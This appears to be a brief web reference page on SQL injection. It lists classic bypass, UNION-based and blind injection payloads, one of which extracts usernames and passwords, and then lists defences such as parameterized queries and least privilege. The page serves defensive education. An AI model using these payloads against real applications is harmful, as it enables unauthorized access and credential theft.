SQL Injection Reference

Common Attack Patterns

-- Classic bypass
' OR '1'='1
admin'--
' OR 1=1--

-- UNION-based
' UNION SELECT username,password FROM users--

-- Blind injection
' AND SLEEP(5)--
' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)--

Prevention

Parameterized Queriesdb.Query("SELECT * FROM users WHERE id=?", id)
ORM UsageUser.objects.filter(id=user_id)
Input ValidationValidate type, length, format before query
Least PrivilegeDB user should have minimal permissions
WAFWeb Application Firewall to filter malicious queries

Alat terkait

🔒 SSL Certificate Checker Check SSL certificate status & expiry 🧮 Password Entropy Calculator Calculate password entropy & strength 🛡 XSS Reference XSS payloads and defense reference 🛡 CSP Policy Generator Generate Content Security Policy 🔑 OAuth 2.0 Builder Build OAuth 2.0 auth request params 🔍 Sensitive Info Detector Detect secrets & passwords in text 🔒 Hash Algorithm Reference Hash algorithm security reference 🔐 SSL/TLS Reference SSL/TLS versions & cipher suites ref 🎫 JWT Best Practices JWT security guide & common errors 🌐 CORS Security Guide CORS cross-origin security practices Rate Limiting Patterns Token bucket, sliding window algos 🔍 Dependency Audit Reference npm/pip/go dependency audit commands